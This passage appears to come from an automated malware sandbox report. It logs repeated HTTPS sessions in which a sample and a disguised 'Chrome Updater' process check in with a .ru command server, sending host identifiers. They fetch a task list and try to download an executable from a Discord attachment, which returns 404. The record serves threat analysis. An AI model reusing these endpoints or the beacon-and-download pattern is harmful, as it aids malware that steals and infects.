                                                                                    2024-01-04 07:31:49 UTC213INData Raw: 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: oding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    250192.168.2.649976104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:49 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:49 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZxhvVZe2%2B4T7ZdxSV8QrYQYzmi9hycysewqZZSmrnXFoKp1UPuaz%2BmRFrxHp%2B8nxoKb0Q1w24jFizH0oO9rmwb0CdVVNnwQCEP%2Bmjjv2sKCMcpY0lxaC2BLgvTcHEeXRIiwCLGQG"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8bada760603-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:49 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    251192.168.2.649977162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:49 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:49 UTC1341INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:49 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8bbf8b13b65-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 93
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:49 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=1vygZKPW9og7_PYdHap6qBG8SN2mG5kFouvMzj2ak1Y-1704353509-1-Abz36OzqFffmmE+YY9a1+49WD2ckLNNDLuJBuWzdgIsAuIH+ZHJ0OiprKnnL57KDxHicfc3+ZbP84LVKyl4WMOo=; path=/; expires=Thu, 04-Jan-24 08:01:49 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=619VIImNn%2FgXHcncuQ86ZvVQsElQQbRBhAGB%2F6ON4mnkgjElsiDvqJ%2FwOT9Oq47JJHVNuOw%2Bq%2BpFxyS%2B17IKNjyGu2SbMcbG8Bh4CXoJViWN0il6TzSx7YIaHpIw2AFp9%2FRBPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=S_CzpvlDbk5nX_FlmOHCojiVGmzeGAkZhrV1R5cu6ts-1704353509777-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:49 UTC28INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67
                                                                                    Data Ascii: <?xml version='1.0' encoding
                                                                                    2024-01-04 07:31:49 UTC208INData Raw: 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    252192.168.2.649978104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:50 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:50 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:50 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vH8hLa6VZPOZlShMZdXNYP97HIrH0G2OXa3pGWSIGpCCo%2BX6v1%2Fx05b6UOdUMLOvySI%2FIeCf%2Bkd0gnfq1%2BK5s%2FsR59Cycos5ofWDG1yBGaN4yZKXGytuOe%2BqfD42BT7XXCvwP50s"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8bf3bfe07f1-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:50 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    253192.168.2.649979104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:50 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:50 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:50 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kWvTxdIhqNh%2FJM3%2BWobNtQFwEKUduX0HekuRtMVbbfcgsYooK%2Fx9QAWCCiBOybzhUFQGfbQ4eFFVTQYhdrLgAzSEpMedYQocRMljztObQxZ5ycG8Bki617jRJrDNS3niqcputFtb"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8bf9da6394c-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:50 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    254192.168.2.649980162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:50 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:51 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:50 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8c35b0a37ee-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 90
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:50 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzI
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=WD_HJYDYOwkqgC.pO7WATzFPblyQ74dAkIyS9UYKbD0-1704353510-1-AZcFlJJEZGLfx3YjVUPxVUoRSOOmIZBFsPMCMqF7A4PzRHpuCYmrL2Cugsih5v+F1bG87EgfkJ0t6oQ5OOPlZ18=; path=/; expires=Thu, 04-Jan-24 08:01:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E2%2Fxy1ErnpOH9oegaXGtrD82KHCZPDBkEQGT2oSRSUhMAQarXHMOYhaMa9%2B%2FBEfcjC0mYpf5nSKfnK8NcyE7Gn6pHooxELu30XnWV%2BuiyDbTWJQEfn8BApZRav3MnKCmXVcSPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=l_GKyp3cGgQH52EJxHSZEQ_IC6VAXhUBtDl8WPH3SRs-1704353510981-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:51 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:31:51 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    255192.168.2.649981104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:51 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:51 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s8u%2BoR2jYfjNy5j7NFE8cKhm%2BPMYYwvNnQI2rvgbIsu9qUvR02Dv8YInC31bbLODJHu1F66nb7%2BmVGhNAKSS5vgNJO9aqdAfmsIK83h%2FoMz2BuY2yf5sMgVrPJMphdbut3B9QvZk"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8c52e6c5a52-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:51 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    256192.168.2.649982104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:51 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:51 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6B8jvCvcNN%2BSEehL7XMJWepC7nSnjZ5nKWN26arAtG9lJU1wpPmeDUozceZaTOb1Sarie1xTIFzn3cv%2F65FdAlUmQ9veXLhphVVrRTnG7DhQCuJhoRacQaEQ3pLv4gtTp%2FZFTIvI"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8c76c8059f7-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:51 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    257192.168.2.649983162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:51 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:51 UTC1352INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:51 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8c95e435788-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 73
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:51 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=C1o1sJSeKlBh2gluLruw51OSVdbMr9ZuVDScb2IJ40o-1704353511-1-ATSp86gwrcYSICQK5bGTW9KL5+PMmAlg06Qwj2x2+NSEb+gsqVT95SwW446oER4Pp0WWQzgJUnXhOav9EYEgEkM=; path=/; expires=Thu, 04-Jan-24 08:01:51 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vssf1sLLtiszSey8%2Bh1%2F%2BrnhGwfzlojFoEye50TP6Snr7yZbXBey%2B6K65SVR%2FlXFBk36NBzTAs%2BxgBMhs7%2BWu5btNRaO6D6aAHcXDjOjgPEp5o2i6%2BABfggmHKGP%2FIIHxfpwWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=adbOTmha16UpwnatoNnhIGO0NUIok.MI_yDgMSviU9k-1704353511929-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:51 UTC236INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    258192.168.2.649984104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:52 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:52 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:52 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4FXtZWAKqNUzaBAjONrcnfvTMfGOxwjkjVRfqnGvYodf%2Bsse4SlqbxYx7E49M1RJiBSlcLfLAF2qimcGeCaNDEM67Gp5iDZMcCDNXm7Dk54BF5QcjqDELyNRc8wWs%2FjhAXiJVs84"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8cbca4f3b1e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:52 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    259192.168.2.649985104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:52 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:52 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:52 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Sn%2FY%2BPbDZI4%2FR2d%2FjwvL7VOqBJX6MF0qUVilzSYvGSOdua3Dy2hmz9rvpldv9tyaw4K7RUbfPmVEAYG1dbN81lQ4cDAGUmEquDtOP1VyfZvM14nt9YnC%2FQCMaKtBoebYohLGr81"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8cce95881cd-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:52 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    260192.168.2.649986162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:52 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:53 UTC1342INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:52 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8d00bdc8298-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 85
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:52 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=rHk7M.OqTa3e2we83Xmx2nY4dhdMzktllg63llkHhfw-1704353512-1-AZdEpiRDqPip22KagnLNPppXGd9j+HVOgRuMvE2dA5ncbLPUTYc+c2mrgjQyDyyItyO9iKKZGOFAvniWAKaQh/Q=; path=/; expires=Thu, 04-Jan-24 08:01:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BcKK%2FzfcKv3bLVacTgYRERb49nH8tWI5%2BFoxqjNsgbRn%2BrxJFAViYFApC9TOCxu08x2SEFohR%2FOMiBpEJwwgPIc18IiC7hgMKj9x1RIh3v28Fl9JoDMjTg7IxmUE5YXdvCVn8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=LWlhh8YO8_vOYXt6.0V7F8KnfH87pcGE4IOpu.yfrDM-1704353512985-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:53 UTC27INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e
                                                                                    Data Ascii: <?xml version='1.0' encodin
